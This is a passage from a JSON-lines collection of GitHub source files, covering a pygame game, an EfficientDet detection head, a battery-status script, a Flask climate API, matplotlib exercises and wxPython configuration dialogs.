block_grid.rotate_counter_clockwise()\r\n\r\n # Update the game state\r\n block_grid.update()\r\n block_grid.check_groups()\r\n screen.blit(matrixImg, (400, 300))\r\n\r\n # Update the score\r\n num_cleared_blocks = block_grid.num_cleared_blocks\r\n if num_cleared_blocks > 0:\r\n score += 30 + 10 * (num_cleared_blocks - 1)\r\n\r\n # Update the timer\r\n if block_grid.has_block_over_red_line():\r\n timer -= 1\r\n else:\r\n timer = MAX_TIMER\r\n\r\n # Check if the game is over\r\n if timer <= 0:\r\n game_over = True\r\n\r\n # Draw the game\r\n block_grid.draw(screen)\r\n score_text = font.render(f\"Score: {score}\", True, (0, 0, 0))\r\n screen.blit(score_text, (10, 10))\r\n timer_text = font.render(f\"Timer: {timer}\", True, (0, 0, 0))\r\n screen.blit(timer_text, (SCREEN_WIDTH - timer_text.get_width() - 10, 10))\r\n pygame.display.flip()\r\n\r\n # Wait for the next frame\r\n clock.tick(FPS)\r\n\r\n # Game over\r\n game_over_text = font.render(\"Game Over\", True, (255, 0, 0))\r\n screen.blit(game_over_text, (SCREEN_WIDTH // 2 - game_over_text.get_width() // 2, SCREEN_HEIGHT // 2 - game_over_text.get_height() // 2))\r\n pygame.display.flip()\r\n pygame.time.wait(2000)\r\n\r\n pygame.quit()\r\n\r\nimport random\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_game()\r\n","repo_name":"JadeFezon/things","sub_path":"TSAGame (2).py","file_name":"TSAGame (2).py","file_ext":"py","file_size_in_byte":14743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"69887993489","text":"# -*- coding:utf-8 -*-\n# Author: huashuoshuo\n# Data: 2019/12/18 16:37\n\nimport torch\nimport torch.nn as nn\nfrom model.BiFPN import ConvBlock\nimport model.losses as losses\nfrom model.efficientdet import EfficientDet\nfrom pycocotools.coco import COCO as COCO\nfrom model.anchors import Anchors\n# from lib.nms.pth_nms import pth_nms\nimport torchvision.ops as ops\nfrom model.util import BasicBlock, Bottleneck, BBoxTransform, ClipBoxes, Filter_boxes\ndef nms(bbox, score, thresh):\n # bbox, score = dets\n return ops.nms(boxes=bbox, scores=score, iou_threshold=thresh)\n # return pth_nms(dets, thresh)\n\n\nclass Reg(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, inp, oup, depth, num_anchor):\n super().__init__()\n self.inp = inp\n self.oup = oup\n self.D = depth\n self.reg = nn.ModuleList()\n self.num_anchors = num_anchor\n\n for i in range(self.D):\n self.reg.append(ConvBlock(inp=self.inp, oup=self.oup, k_size=3, stride=1, padding=1))\n # self.retina_cls = nn.Conv2d(self.oup, self.num_anchors * self.num_class, 3, padding=1)\n self.retina_reg = nn.Conv2d(self.oup, self.num_anchors * 4, 3, padding=1)\n def forward(self, x):\n reg = x\n for conv in self.reg:\n reg = conv(reg)\n\n reg = self.retina_reg(reg)\n\n reg = reg.permute(0, 2, 3, 1)\n return reg.contiguous().view(reg.shape[0], -1, 4)\n\nclass Cls(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, inp, oup, depth, num_anchor, num_class):\n super().__init__()\n self.inp = inp\n self.oup = oup\n self.D = depth\n self.cls = nn.ModuleList()\n self.num_anchors = num_anchor\n self.num_class = num_class\n for i in range(self.D):\n self.cls.append(ConvBlock(inp=self.inp, oup=self.oup, k_size=3, stride=1, padding=1))\n self.retina_cls = nn.Conv2d(self.oup, self.num_anchors * self.num_class, 3, padding=1)\n self.act = nn.Sigmoid()\n def forward(self, x):\n cls = x\n for conv in self.cls:\n cls = conv(cls)\n cls = self.retina_cls(cls)\n cls = self.act(cls)\n\n cls = cls.permute(0, 2, 3, 1)\n\n batch_size, width, height, channel = cls.shape\n\n out = cls.view(batch_size, width, height, self.num_anchors, self.num_class)\n return out.contiguous().view(cls.shape[0], -1, self.num_class)\n\n\nclass RetinaHead(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, parser, num_classes=80, num_anchor=9, is_demo=False):\n super().__init__()\n depth = 3\n inp = oup = 64\n\n self.regression = Reg(inp, oup, depth-1, num_anchor)\n self.classification = Cls(inp, oup, depth-1, num_anchor, num_classes)\n self.FocalLoss = losses.FocalLoss()\n self.anchors = Anchors()\n self.EfficientDet = EfficientDet(parser)\n self.regressBoxes = BBoxTransform()\n self.is_demo = is_demo\n self.clipBoxes = ClipBoxes()\n def forward(self, inputs):\n if self.training:\n img_batch, annotations = inputs\n else:\n img_batch = inputs\n\n features = self.EfficientDet(img_batch)\n regression = torch.cat([self.regression(feature) for feature in features], dim=1)\n classification = torch.cat([self.classification(feature) for feature in features], dim=1)\n anchors = self.anchors(img_batch)\n\n # self.FocalLoss(classification, regression, anchors, annotations)\n if self.training:\n return self.FocalLoss(classification, regression, anchors, annotations)\n else:\n transformed_anchors = self.regressBoxes(anchors, regression)\n transformed_anchors = self.clipBoxes(transformed_anchors, img_batch)\n\n scores = torch.max(classification, dim=2, keepdim=True)[0]\n\n if self.is_demo:\n return transformed_anchors, classification, scores\n\n scores_over_thresh = (scores>0.01)[0, :, 0]\n\n if scores_over_thresh.sum() == 0:\n # no boxes to NMS, just return\n return [torch.zeros(0).cuda(), torch.zeros(0).cuda(), torch.zeros(0, 4).cuda()]\n\n classification = classification[:, scores_over_thresh, :]\n transformed_anchors = transformed_anchors[:, scores_over_thresh, :]\n scores = scores[:, scores_over_thresh, :]\n # print(transformed_anchors.shape, scores.shape)\n\n # anchors_nms_idx = nms(torch.cat([transformed_anchors, scores], dim=2)[0, :, :], 0.5)\n # print(transformed_anchors[0, :, :])\n anchors_nms_idx = nms(transformed_anchors[0, :, :], scores[0, :, 0], 0.45)\n nms_scores, nms_class = classification[0, anchors_nms_idx, :].max(dim=1)\n\n return [nms_scores, nms_class, transformed_anchors[0, anchors_nms_idx, :]]\n\n\n\n\n\n\n","repo_name":"coderhss/efficientdet-pytorch","sub_path":"model/RetinaHead.py","file_name":"RetinaHead.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"65"} +{"seq_id":"37521805685","text":"#!/usr/bin/env python\nimport os\nimport subprocess\n#output = subprocess.check_output(\"cat /etc/services\", shell=True)\n\noutput = subprocess.check_output(\"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | awk '/percentage/ {print $2}'\",shell=True)\ncharging = subprocess.check_output(\"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | awk '/discharging/ {print $2}'\",shell=True)\nfilename = \"/home/nick/Documents/.battery\"\n\n \n\n\nlevel = int(output[:-2])\nlow = False\nlimit = 60\nhigh = 80\nlow = 25\n\nif(\"discharging\" not in charging):\n print(\"/home/nick/Pictures/icons/battery_charging.svg\")\nelse:\n if(level >= high):\n print(\"/home/nick/Pictures/icons/battery_good.svg\")\n elif((level < high) and (level >= low)):\n print(\"/home/nick/Pictures/icons/battery_medium.svg\")\n else:\n print(\"/home/nick/Pictures/icons/battery_low.svg\")\n\nif(level < 75 and \"discharging\" in charging):\n if not os.path.exists(filename):\n print(\"?\")\n subprocess.call(\"notify-send\",shell = True)\n file = open(filename,\"w\")\n file.write(\"t\")\n file.close()\n\n \n#print(charging)\nprint(str(level) + \"%\")\n","repo_name":"lorem-ipsumm/dotfiles","sub_path":"battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"39518151452","text":"# import dependencies\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\n\n# Setup/Access SQLite Database\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Relect database into the classes\nBase = automap_base()\n\nBase.prepare(engine, reflect=True)\n\n# Save our references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create a session link from Python to the database\nsession = Session(engine)\n\n# create/define a new Flask app instance\napp = Flask(__name__)\n\n# create flask routes\n@app.route('/')\n# Welcome route\ndef welcome():\n return(\n f\"Welcome to the Climate Analysis API!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/temp/start/end
\")\n\n# Precipitation route\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n# Stations Route\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n results = session.query(Station.station).all()\n stations = list(np.ravel(results))\n return jsonify(stations=stations)\n\n# Temperature Observations for previous year route\n@app.route(\"/api/v1.0/tobs\")\ndef temp_monthly():\n # date from one year ago\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query the primary station from all temp observations from the previous year\n results = session.query(Measurement.tobs).filter(Measurement.station == \"USC00519281\").filter(Measurement.date >= prev_year).all()\n # unravel the results into a one-dimensional array and turn it into a list; then jsonify the list and return it\n temps = list(np.ravel(results))\n return jsonify(temps=temps)\n\n# Statistics Route-- need a start and end date, so two different routes\n@app.route(\"/api/v1.0/temp/\")\n@app.route(\"/api/v1.0/temp//\")\n# Create a function (no start or end for now)\ndef stats(start=None, end=None):\n # Create a query to select min, avg, and max temps from SQLite\n sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n # create if-not statement to find the start and end date. Query our database using the list^ and then unravel the results\n if not end:\n results = session.query(*sel).filter(Measurement.date >= start).all()\n temps = list(np.ravel(results))\n return jsonify(temps)\n # calculate the temp min, avg, and max with the start and end dates\n results = session.query(*sel).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n temps = list(np.ravel(results))\n return jsonify(temps)\n\n","repo_name":"mabuckjr/surfs_up","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73100349646","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport seaborn as sns\n\niris = sns.load_dataset('iris')\ntitanic = sns.load_dataset('titanic')\n\n\"\"\"\nFew advanced features\n\"\"\"\n\ndef create_sample_data():\n x_vals = np.linspace(0,20,20)\n y_vals = [math.sqrt(i) for i in x_vals]\n return x_vals, y_vals\n\ndef use_subplot():\n plt.rcParams[\"figure.figsize\"] = [12,8]\n x_v, y_v = create_sample_data()\n plt.subplot(2,2,1)\n plt.plot(x_v, y_v, 'bo-')\n plt.subplot(2,2,2)\n plt.plot(x_v, y_v, 'rx-')\n plt.subplot(2,2,3)\n plt.plot(x_v, y_v, \"g*-\")\n plt.subplot(2,2,4)\n plt.plot(x_v, y_v,\"y^-\")\n plt.show()\n\ndef use_for_and_save():\n x_v, y_v = create_sample_data()\n fix, axes = plt.subplots(nrows=4,ncols=2)\n for rows in axes:\n for ax1 in rows:\n ax1.plot(x_v, y_v,'g')\n ax1.set_title(\"sqrt\")\n plt.show()\n\ndef ex1_func():\n dat = np.linspace(1,60,60)\n plt.subplot(3,1,1)\n plt.plot(dat, np.sin(dat))\n plt.subplot(3,1,2)\n plt.plot(dat, np.cos(dat))\n plt.subplot(3,1,3)\n plt.plot(dat, np.tan(dat))\n plt.show()\n\n\ndef start_execution():\n #use_subplot()\n #use_for_and_save()\n ex1_func()\n\n\n\nif __name__==\"__main__\":\n start_execution()\n\n","repo_name":"dineshhmn/viz_learning","sub_path":"files/file2_chap3.py","file_name":"file2_chap3.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"35898893573","text":"'''\nCreated on 27. juni 2012\n\n@author: pcn\n'''\nimport wx\nfrom configuration.PlayerConfiguration import PlayerConfiguration\nfrom midi.MidiUtilities import noteToNoteString\nimport sys\n\nclass ConfigOpenDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, sendOpenCommandCallback, configList, lastSelectedConfig):\n super(ConfigOpenDialog, self).__init__(parent=parent, title=title, size=(300, 150))\n\n self._sendOpenCommandCallback = sendOpenCommandCallback\n self._configList = configList\n self._lastSelectedConfig = lastSelectedConfig\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Please select file to open:\") #@UndefinedVariable\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configListSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configListLabel = wx.StaticText(self, wx.ID_ANY, \"Configuration:\") #@UndefinedVariable\n self._configListField = wx.ComboBox(self, wx.ID_ANY, size=(200, -1), choices=[], style=wx.CB_READONLY) #@UndefinedVariable\n self._configListField.Clear()\n valueOk = False\n backupSelection = self._configList[0]\n for choice in self._configList:\n self._configListField.Append(choice)\n if(choice == self._lastSelectedConfig):\n valueOk = True\n if(valueOk == True):\n self._configListField.SetStringSelection(self._lastSelectedConfig)\n else:\n self._configListField.SetStringSelection(backupSelection)\n configListSizer.Add(configListLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configListSizer.Add(self._configListField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configListSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n loadButton = wx.Button(self, wx.ID_ANY, 'Load', size=(60,-1)) #@UndefinedVariable\n loadButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(loadButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n loadButton.Bind(wx.EVT_BUTTON, self._onLoad) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onLoad(self, event):\n self._sendOpenCommandCallback(self._configListField.GetValue())\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigNewDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, updateConfigNameCallback, currentConfigName):\n super(ConfigNewDialog, self).__init__(parent=parent, title=title, size=(300, 120))\n\n self._updateConfigNameCallback = updateConfigNameCallback\n self._currentConfigName = currentConfigName\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Please type new name:\") #@UndefinedVariable\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configNameLabel = wx.StaticText(self, wx.ID_ANY, \"New name:\") #@UndefinedVariable\n self._configNameField = wx.TextCtrl(self, wx.ID_ANY, str(self._currentConfigName), size=(120, -1)) #@UndefinedVariable\n configNameSizer.Add(configNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configNameSizer.Add(self._configNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'New', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n self._updateConfigNameCallback(self._configNameField.GetValue())\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n\nclass ConfigGuiDialog(wx.Dialog): #@UndefinedVariable\n def __init__(self, parent, title, configurationClass, playerId):\n super(ConfigGuiDialog, self).__init__(parent=parent, title=title, size=(440, 600))\n\n self._configurationClass = configurationClass\n self._playerId = playerId\n\n dialogSizer = wx.BoxSizer(wx.VERTICAL) #@UndefinedVariable\n self.SetBackgroundColour((180,180,180))\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Player:\") #@UndefinedVariable\n boldFont = infoText.GetFont()\n boldFont.SetWeight(wx.BOLD) #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostName, playerWebPort = self._configurationClass.getWebConfig(self._playerId)\n\n isMidiOn = self._configurationClass.isMidiEnabled(self._playerId)\n playerMidiOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiOnLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI:\") #@UndefinedVariable\n self._playerMidiOnField = wx.CheckBox(self, wx.ID_ANY, \"Send MIDI notes from GUI to player.\") #@UndefinedVariable\n self._playerMidiOnField.SetValue(isMidiOn)\n playerMidiOnSizer.Add(playerMidiOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiOnSizer.Add(self._playerMidiOnField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerHostNameLabel = wx.StaticText(self, wx.ID_ANY, \"Host address:\") #@UndefinedVariable\n self._playerHostNameField = wx.TextCtrl(self, wx.ID_ANY, str(playerHostName), size=(120, -1)) #@UndefinedVariable\n playerHostNameSizer.Add(playerHostNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerHostNameSizer.Add(self._playerHostNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerHostNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerHostName, playerMidiPort, playerMode = self._configurationClass.getMidiConfig(self._playerId)\n playerMidiPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"MIDI port:\") #@UndefinedVariable\n self._playerMidiPortField = wx.SpinCtrl(self, value=str(playerMidiPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerMidiPortField.SetRange(1024, 9999)\n playerMidiPortSizer.Add(playerMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerMidiPortSizer.Add(self._playerMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n playerWebPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n playerWebPortLabel = wx.StaticText(self, wx.ID_ANY, \"Web port:\") #@UndefinedVariable\n self._playerWebPortField = wx.SpinCtrl(self, value=str(playerWebPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._playerWebPortField.SetRange(1024, 9999)\n playerWebPortSizer.Add(playerWebPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n playerWebPortSizer.Add(self._playerWebPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(playerWebPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"GUI:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n isAutosendOn = self._configurationClass.isAutoSendEnabled()\n autoSendOnSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n autoSendOnLabel = wx.StaticText(self, wx.ID_ANY, \"Autosend:\") #@UndefinedVariable\n self._autoSendOnField = wx.CheckBox(self, wx.ID_ANY, \"Send all configuration changes to Player.\") #@UndefinedVariable\n self._autoSendOnField.SetValue(isAutosendOn)\n autoSendOnSizer.Add(autoSendOnLabel, 1, wx.ALL, 5) #@UndefinedVariable\n autoSendOnSizer.Add(self._autoSendOnField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(autoSendOnSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiBindBroadcast, guiMidiBindAddress, guiMidiBindPort = self._configurationClass.getMidiListenConfig()\n guiMidiBindAddressSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiBindAddressLabel = wx.StaticText(self, wx.ID_ANY, \"Input address:\") #@UndefinedVariable\n self._guiMidiBindAddressField = wx.TextCtrl(self, wx.ID_ANY, str(guiMidiBindAddress), size=(120, -1)) #@UndefinedVariable\n guiMidiBindAddressSizer.Add(guiMidiBindAddressLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiBindAddressSizer.Add(self._guiMidiBindAddressField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiBindAddressSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiPortSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiPortLabel = wx.StaticText(self, wx.ID_ANY, \"Input port:\") #@UndefinedVariable\n self._guiMidiPortField = wx.SpinCtrl(self, value=str(guiMidiBindPort), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._guiMidiPortField.SetRange(1024, 9999)\n guiMidiPortSizer.Add(guiMidiPortLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiPortSizer.Add(self._guiMidiPortField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiPortSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n guiMidiBroadcastSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n guiMidiBroadcastLabel = wx.StaticText(self, wx.ID_ANY, \"Broadcast:\") #@UndefinedVariable\n self._guiMidiBroadcastField = wx.CheckBox(self, wx.ID_ANY, \"Receive broadcast packets.\") #@UndefinedVariable\n self._guiMidiBroadcastField.SetValue(guiMidiBindBroadcast)\n guiMidiBroadcastSizer.Add(guiMidiBroadcastLabel, 1, wx.ALL, 5) #@UndefinedVariable\n guiMidiBroadcastSizer.Add(self._guiMidiBroadcastField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(guiMidiBroadcastSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n sizeX, sizeY = self._configurationClass.getWindowSize()\n windowSizeSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n windowSizeLabel = wx.StaticText(self, wx.ID_ANY, \"GUI window size:\") #@UndefinedVariable\n self._windowSizeField = wx.TextCtrl(self, wx.ID_ANY, str(sizeX) + \",\" + str(sizeY), size=(120, -1)) #@UndefinedVariable\n windowSizeSizer.Add(windowSizeLabel, 1, wx.ALL, 5) #@UndefinedVariable\n windowSizeSizer.Add(self._windowSizeField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(windowSizeSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n posX, posY = self._configurationClass.getWindowPosition()\n windowPosSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n windowPosLabel = wx.StaticText(self, wx.ID_ANY, \"GUI window position:\") #@UndefinedVariable\n self._windowPosField = wx.TextCtrl(self, wx.ID_ANY, str(posX) + \",\" + str(posY), size=(120, -1)) #@UndefinedVariable\n windowPosSizer.Add(windowPosLabel, 1, wx.ALL, 5) #@UndefinedVariable\n windowPosSizer.Add(self._windowPosField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(windowPosSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n showDmx = self._configurationClass.isShowDMX()\n showDmxSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n showDmxLabel = wx.StaticText(self, wx.ID_ANY, \"DMX:\") #@UndefinedVariable\n self._showDmxField = wx.CheckBox(self, wx.ID_ANY, \"Show DMX in GUI.\") #@UndefinedVariable\n self._showDmxField.SetValue(showDmx)\n showDmxSizer.Add(showDmxLabel, 1, wx.ALL, 5) #@UndefinedVariable\n showDmxSizer.Add(self._showDmxField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(showDmxSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n showKinect = self._configurationClass.isShowKinect()\n showKinectSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n showKinectLabel = wx.StaticText(self, wx.ID_ANY, \"Kinect:\") #@UndefinedVariable\n self._showKinectField = wx.CheckBox(self, wx.ID_ANY, \"Show Kinect in GUI.\") #@UndefinedVariable\n self._showKinectField.SetValue(showKinect)\n showKinectSizer.Add(showKinectLabel, 1, wx.ALL, 5) #@UndefinedVariable\n showKinectSizer.Add(self._showKinectField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(showKinectSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Convertion:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n ffmpegBinary = self._configurationClass.getFfmpegBinary()\n ffmpegBinarySizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n ffmpegBinaryLabel = wx.StaticText(self, wx.ID_ANY, \"ffmpeg binary:\") #@UndefinedVariable\n self._ffmpegBinaryField = wx.TextCtrl(self, wx.ID_ANY, str(ffmpegBinary), size=(120, -1)) #@UndefinedVariable\n ffmpegBinarySizer.Add(ffmpegBinaryLabel, 1, wx.ALL, 5) #@UndefinedVariable\n ffmpegBinarySizer.Add(self._ffmpegBinaryField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(ffmpegBinarySizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n ffmpegH264Options = self._configurationClass.getFfmpegH264Options()\n ffmpegOptionsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n ffmpegOptionsLabel = wx.StaticText(self, wx.ID_ANY, \"ffmpeg h264 options:\") #@UndefinedVariable\n self._ffmpegOptionsField = wx.TextCtrl(self, wx.ID_ANY, str(ffmpegH264Options), size=(120, -1)) #@UndefinedVariable\n ffmpegOptionsSizer.Add(ffmpegOptionsLabel, 1, wx.ALL, 5) #@UndefinedVariable\n ffmpegOptionsSizer.Add(self._ffmpegOptionsField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(ffmpegOptionsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n scaleX = self._configurationClass.getVideoScaleX()\n scaleXSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n scaleXLabel = wx.StaticText(self, wx.ID_ANY, \"Default X scale size:\") #@UndefinedVariable\n self._scaleXField = wx.SpinCtrl(self, value=str(scaleX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._scaleXField.SetRange(-1, 8000)\n scaleXSizer.Add(scaleXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n scaleXSizer.Add(self._scaleXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(scaleXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n scaleY = self._configurationClass.getVideoScaleY()\n scaleYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n scaleYLabel = wx.StaticText(self, wx.ID_ANY, \"Default Y scale size:\") #@UndefinedVariable\n self._scaleYField = wx.SpinCtrl(self, value=str(scaleY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._scaleYField.SetRange(-1, 6000)\n scaleYSizer.Add(scaleYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n scaleYSizer.Add(self._scaleYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(scaleYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n videoDirectory = self._configurationClass.getGuiVideoDir()\n videoDirectorySizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n videoDirectoryLabel = wx.StaticText(self, wx.ID_ANY, \"Video directory:\") #@UndefinedVariable\n self._videoDirectoryField = wx.TextCtrl(self, wx.ID_ANY, str(videoDirectory), size=(120, -1)) #@UndefinedVariable\n videoDirectorySizer.Add(videoDirectoryLabel, 1, wx.ALL, 5) #@UndefinedVariable\n videoDirectorySizer.Add(self._videoDirectoryField, 2, wx.ALL, 5) #@UndefinedVariable\n 